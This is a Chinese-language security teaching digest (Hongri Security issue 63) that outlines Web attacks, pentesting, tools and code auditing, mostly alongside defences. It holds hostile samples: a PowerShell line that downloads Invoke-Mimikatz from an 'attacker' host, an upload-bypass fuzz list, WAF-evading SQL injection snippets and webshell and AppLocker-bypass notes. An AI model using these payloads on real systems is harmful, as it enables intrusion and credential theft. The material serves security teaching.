专注Web及移动安全[红日安全63期]
字数 2192 2025-08-18 11:37:45

红日安全63期:Web及移动安全综合教学文档

一、安全动态

1.1 红日AI安全-基于机器学习的攻击检测系统

  • 核心概念:利用机器学习算法识别异常网络行为
  • 关键技术
    • 特征工程:提取网络流量特征(如请求频率、payload模式)
    • 监督学习:使用标记数据集训练分类模型
    • 无监督学习:异常检测算法识别未知攻击模式
  • 应用场景:DDoS检测、SQL注入识别、XSS攻击发现

1.2 信息安全漏洞周报(2018年第43期)

  • 漏洞跟踪方法
    • CVE编号系统
    • CVSS评分标准
    • 漏洞影响范围评估
  • 关键漏洞示例
    • Apache Struts2远程代码执行
    • WordPress插件漏洞
    • IoT设备默认凭证问题

二、Web安全

2.1 SQL注入绕过WAF技术(内联注释篇)

  • 基本原理
    /*!SELECT*/ * FROM users WHERE id = 1
    
  • 绕过技术
    • MySQL特性注释:/*!50727SELECT*/
    • 注释分割关键词:SEL/*xxx*/ECT
    • 空白符变异:SEL%0bECT
  • 防御措施
    • 参数化查询
    • 输入验证正则表达式
    • WAF规则更新策略

2.2 Tomcat样例目录session操控漏洞

  • 漏洞详情
    • 路径:/examples/servlets/servlet/SessionExample
    • 攻击方式:会话固定攻击
    • 影响版本:Tomcat 7.x/8.x未加固配置
  • 修复方案
    • 删除样例应用
    • 配置context.xml的<Manager>设置
    • 启用cookie的HttpOnly和Secure标志

2.3 Email收集神器技术解析

  • 收集方法
    • 爬虫技术:Scrapy框架实现
    • 正则表达式模式:
      r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
      
    • 公开数据源:GitHub代码搜索、WHOIS查询
  • 防御措施
    • 联系信息混淆技术
    • CAPTCHA验证
    • 速率限制

2.4 CMS安全分析(Discuz!篇)

  • 常见漏洞
    • 文件上传绕过(.php5后缀)
    • XSS存储型漏洞(用户组名称)
    • SQL注入(forum_attachment字段)
  • 安全配置
    • 关闭插件自动更新
    • 设置data目录不可执行
    • 定期审核模板文件

三、渗透测试

3.1 从MySQL出发的反击

  • 权限提升路径
    1. 低权限SQL注入 → 2. 读取数据库凭据 → 3. 获取系统shell
  • 关键技术
    • into outfile写webshell
    • UDF提权(lib_mysqludf_sys)
    • MySQL日志文件注入

3.2 优质上传漏洞Fuzz字典

  • 文件上传绕过技术
    • 扩展名变异:file.php.jpg
    • MIME类型伪造:Content-Type: image/png
    • 双扩展名:file.png.php
  • Fuzz字典示例
    shell.php%00.jpg
    shell.php\x0a.jpg
    .htaccess (php_value engine on)
    

3.3 Windows AppLocker绕过

  • 绕过技术
    • InstallUtil.exe执行
    • Regsvr32脚本托管
    • MSBuild内联任务
    • 白名单DLL劫持
  • 防御措施
    • 启用脚本规则
    • 配置DLL规则
    • 实施路径规则

3.4 PowerShell渗透应用

  • 攻击脚本示例
    IEX (New-Object Net.WebClient).DownloadString('http://attacker/Invoke-Mimikatz.ps1')
    
  • 隐蔽技术
    • 编码命令(Base64)
    • 内存注入
    • 日志清除
  • 检测方法
    • 脚本块日志记录
    • 约束语言模式
    • AMSI集成

四、安全工具

4.1 DirBuster使用指南

  • 配置参数
    • 线程数优化(建议10-20)
    • 字典选择(common.txt, directory-list-2.3-medium.txt)
    • 递归深度设置
  • 高级技巧
    • 基于响应的智能识别
    • 404页面指纹识别
    • 结果导出格式(XML/CSV)

4.2 现代密码学工具包

  • 包含算法
    • 非对称加密:RSA/ECC
    • 对称加密:AES/ChaCha20
    • 哈希算法:SHA-3/BLAKE2
  • 应用示例
    from cryptography.hazmat.primitives import hashes
    digest = hashes.Hash(hashes.SHA256())
    

4.3 中国菜刀使用解析

  • 连接配置
    • 加密传输设置
    • 自定义UA头
    • 连接超时调整
  • 功能模块
    • 文件管理(权限修改)
    • 数据库管理(SQL查询)
    • 虚拟终端(命令执行)

五、代码审计

5.1 escapeshellarg与escapeshellcmd漏洞

  • 危险模式
    system(escapeshellcmd(escapeshellarg($input)));
    
  • 安全编码
    • 使用白名单过滤
    • 避免命令拼接
    • 考虑使用proc_open替代system

5.2 正则表达式路径穿越

  • 漏洞示例
    preg_replace('/\.\.\//', '', $input) // 可被.../绕过
    
  • 修复方案
    • 使用realpath函数
    • 严格白名单验证
    • 结合basename使用

六、视频课程要点

6.1 网络安全评估框架

  • 评估流程
    1. 资产发现 → 2. 漏洞扫描 → 3. 渗透测试 → 4. 风险评估
  • 关键指标
    • 攻击面测量
    • 平均修复时间(MTTR)
    • 风险评分模型

6.2 安全威胁情报应用

  • 情报生命周期
    • 收集 → 分析 → 生产 → 分发 → 反馈
  • 企业集成
    • SIEM系统对接
    • 自动化阻断规则
    • 攻击指标(IOC)管理

附录:速查表

漏洞类型 测试方法 修复方案
SQL注入 ' OR 1=1-- 参数化查询
XSS 输出编码
CSRF 伪造请求测试 Anti-CSRF Token
文件上传 扩展名变异 内容检测+随机命名

推荐学习路径

  1. OWASP Top 10 实践
  2. PTES渗透测试标准
  3. MITRE ATT&CK框架研究
红日安全63期:Web及移动安全综合教学文档 一、安全动态 1.1 红日AI安全-基于机器学习的攻击检测系统 核心概念 :利用机器学习算法识别异常网络行为 关键技术 : 特征工程:提取网络流量特征(如请求频率、payload模式) 监督学习:使用标记数据集训练分类模型 无监督学习:异常检测算法识别未知攻击模式 应用场景 :DDoS检测、SQL注入识别、XSS攻击发现 1.2 信息安全漏洞周报(2018年第43期) 漏洞跟踪方法 : CVE编号系统 CVSS评分标准 漏洞影响范围评估 关键漏洞示例 : Apache Struts2远程代码执行 WordPress插件漏洞 IoT设备默认凭证问题 二、Web安全 2.1 SQL注入绕过WAF技术(内联注释篇) 基本原理 : 绕过技术 : MySQL特性注释: /*!50727SELECT*/ 注释分割关键词: SEL/*xxx*/ECT 空白符变异: SEL%0bECT 防御措施 : 参数化查询 输入验证正则表达式 WAF规则更新策略 2.2 Tomcat样例目录session操控漏洞 漏洞详情 : 路径: /examples/servlets/servlet/SessionExample 攻击方式:会话固定攻击 影响版本:Tomcat 7.x/8.x未加固配置 修复方案 : 删除样例应用 配置context.xml的 <Manager> 设置 启用cookie的HttpOnly和Secure标志 2.3 Email收集神器技术解析 收集方法 : 爬虫技术:Scrapy框架实现 正则表达式模式: 公开数据源:GitHub代码搜索、WHOIS查询 防御措施 : 联系信息混淆技术 CAPTCHA验证 速率限制 2.4 CMS安全分析(Discuz !篇) 常见漏洞 : 文件上传绕过(.php5后缀) XSS存储型漏洞(用户组名称) SQL注入(forum_ attachment字段) 安全配置 : 关闭插件自动更新 设置data目录不可执行 定期审核模板文件 三、渗透测试 3.1 从MySQL出发的反击 权限提升路径 : 低权限SQL注入 → 2. 读取数据库凭据 → 3. 获取系统shell 关键技术 : into outfile 写webshell UDF提权(lib_ mysqludf_ sys) MySQL日志文件注入 3.2 优质上传漏洞Fuzz字典 文件上传绕过技术 : 扩展名变异: file.php.jpg MIME类型伪造: Content-Type: image/png 双扩展名: file.png.php Fuzz字典示例 : 3.3 Windows AppLocker绕过 绕过技术 : InstallUtil.exe执行 Regsvr32脚本托管 MSBuild内联任务 白名单DLL劫持 防御措施 : 启用脚本规则 配置DLL规则 实施路径规则 3.4 PowerShell渗透应用 攻击脚本示例 : 隐蔽技术 : 编码命令(Base64) 内存注入 日志清除 检测方法 : 脚本块日志记录 约束语言模式 AMSI集成 四、安全工具 4.1 DirBuster使用指南 配置参数 : 线程数优化(建议10-20) 字典选择(common.txt, directory-list-2.3-medium.txt) 递归深度设置 高级技巧 : 基于响应的智能识别 404页面指纹识别 结果导出格式(XML/CSV) 4.2 现代密码学工具包 包含算法 : 非对称加密:RSA/ECC 对称加密:AES/ChaCha20 哈希算法:SHA-3/BLAKE2 应用示例 : 4.3 中国菜刀使用解析 连接配置 : 加密传输设置 自定义UA头 连接超时调整 功能模块 : 文件管理(权限修改) 数据库管理(SQL查询) 虚拟终端(命令执行) 五、代码审计 5.1 escapeshellarg与escapeshellcmd漏洞 危险模式 : 安全编码 : 使用白名单过滤 避免命令拼接 考虑使用proc_ open替代system 5.2 正则表达式路径穿越 漏洞示例 : 修复方案 : 使用realpath函数 严格白名单验证 结合basename使用 六、视频课程要点 6.1 网络安全评估框架 评估流程 : 资产发现 → 2. 漏洞扫描 → 3. 渗透测试 → 4. 风险评估 关键指标 : 攻击面测量 平均修复时间(MTTR) 风险评分模型 6.2 安全威胁情报应用 情报生命周期 : 收集 → 分析 → 生产 → 分发 → 反馈 企业集成 : SIEM系统对接 自动化阻断规则 攻击指标(IOC)管理 附录:速查表 | 漏洞类型 | 测试方法 | 修复方案 | |---------|---------|---------| | SQL注入 | ' OR 1=1-- | 参数化查询 | | XSS | alert(1) | 输出编码 | | CSRF | 伪造请求测试 | Anti-CSRF Token | | 文件上传 | 扩展名变异 | 内容检测+随机命名 | 推荐学习路径 : OWASP Top 10 实践 PTES渗透测试标准 MITRE ATT&CK框架研究